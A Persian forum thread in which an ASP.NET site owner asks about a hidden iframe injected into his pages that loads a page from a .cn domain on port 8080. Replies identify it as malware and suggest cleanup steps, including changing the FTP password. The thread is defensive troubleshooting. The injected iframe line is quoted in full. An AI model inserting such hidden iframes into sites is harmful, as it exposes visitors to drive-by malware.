فریم عجیب در بالای سایت

[aref1364]

سلام

صفحات سایت من ASP.NET با VB.NET است.
بالای برخی از صفحات قبل از تگ فرم و درست بعد از تگ body کد زیر رو دیدم که بالای سایت یه فضای خالی درست میکرد:

<iframe src="http://bigtopstudios.cn:8080/index.php" width=195 height=113 style="visibility: hidden"></iframe>

این کد چجوری وارد اون قسمت از فایل aspx شده؟

اینم بگم این زمانی اتفاق افتاد که داشتم روی سایت تغییراتی میدادم و آپلود میکردم؟

کار چه برنامه یا ویروسی میتونه باشه؟

با تشکر

 

[Graveworm]

این صفحه ویروس هست و احتمالا شما هم به اون مبتلا شدید
با نرم افزار اسکن کنید تا از بین بره

 

[aref1364]

این صفحه ویروس هست و احتمالا شما هم به اون مبتلا شدید
با نرم افزار اسکن کنید تا از بین بره

من با nod32 اورجینال و آپدیت شده اسکن کردم هیچ چیزی پیدا نشد. این فایل هرچی که هست روی سرور اختصاصی من وجود داره الان.

چه راهی برای از بین بردنش پیشنهاد می کنید؟

با تشکر

 

[Graveworm]

روی لوکال جرا میکنید چنین چیزی نیست؟
پس سرور آلوده شده، باید به مسوولین سرور میل بزنید - معمولا سرور ها آنتی ویروس دارند :؟

 

[cyber boy]

این همون Malware معروفه دامنه های چینیه که جدیدا بعضی سایت ها آلوده شدن باهاش.

چک کنید ببینید دقیقا قبل از تگ body کد جاوا اسکریپتیه عجیب نمیبینید؟ اگه هست در اکثر صفحات باید باشه که پاک کنین همرو.

اگر folder ای به اسم images دارید ببینید فایل php ناآشنا تو فولدر هست یا نه. که این source اصلیه malware هست که باید پاکش کنید.

در آخر هم پسورد ftp رو عوض کنید.

 

[aref1364]

این همون Malware معروفه دامنه های چینیه که جدیدا بعضی سایت ها آلوده شدن باهاش.

چک کنید ببینید دقیقا قبل از تگ body کد جاوا اسکریپتیه عجیب نمیبینید؟ اگه هست در اکثر صفحات باید باشه که پاک کنین همرو.

اگر folder ای به اسم images دارید ببینید فایل php ناآشنا تو فولدر هست یا نه. که این source اصلیه malware هست که باید پاکش کنید.

در آخر هم پسورد ftp رو عوض کنید.

خیلی ممنون از راهنمایی این واقعا اعصاب منو خورد کرده. توی سورس اصلی برنامه قبل از تگ body هیچ کد جاوایی نیست ولی کد زیر موقع لود شدن صفحه توی view source اینترنت اکسپلورر دیده میشه:

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=2I5FvX-4P8pTfyHFjquMqw2&amp;t=633777697118482500" type="text/javascript"></script>


<script src="/WebResource.axd?d=65-2iX8x_7e-UsXo8ZEFO1X_nmn8774f5K61-1_EcIM1&amp;t=633777697118482500" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

اون پایینی فکر کنم مربوط به validation کنترلهایی هست که گذاشتم داخل فرم اما اون اولی رو مطمئن نیستم که طبیعیه یا نه ولی فکر کنم طبیعیه!

فایل php نا آشنا هم وجود نداشت پسورد FTP ر. هم عوض کردم. منتظر میمونم ببینم بازم اون فریم میاد یا نه.

بازم ممنون از راهنماییتون

 

[Graveworm]

این ها برای خود asp.net هست که ساخته میشه مشکلی نداره
آدرس صفحه رو اگه بذاری یه نگاه بندازیم

 

[aref1364]

این همون Malware معروفه دامنه های چینیه که جدیدا بعضی سایت ها آلوده شدن باهاش.

چک کنید ببینید دقیقا قبل از تگ body کد جاوا اسکریپتیه عجیب نمیبینید؟ اگه هست در اکثر صفحات باید باشه که پاک کنین همرو.

اگر folder ای به اسم images دارید ببینید فایل php ناآشنا تو فولدر هست یا نه. که این source اصلیه malware هست که باید پاکش کنید.

در آخر هم پسورد ftp رو عوض کنید.

خیلی ممنون مشکل همین بود.

تنها کاری که کردم عوض کردن پسورد ftp بود چون موارد دیگه روی سرور وجود نداشت.